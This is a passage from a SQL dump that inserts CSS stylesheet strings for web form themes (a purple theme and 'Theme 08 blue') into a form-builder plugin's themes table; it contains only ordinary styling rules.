#DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #930049 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #930049;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #EEEEEE;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #930049;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #930049;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="text"]:focus {\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #636363;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8A8A8A;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8A8A8A;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #930049;\r\ncursor: pointer;\r\nbackground-color: #fff;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #930049;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98%;\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #fff;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(30, 'Theme 08 blue', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #070068;\r\nmargin-bottom: 10px;\r\ncolor: #070068;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #070068 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #070068;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #070068;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #070068;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="text"]:focus {\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #636363;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8A8A8A;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8A8A8A;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida 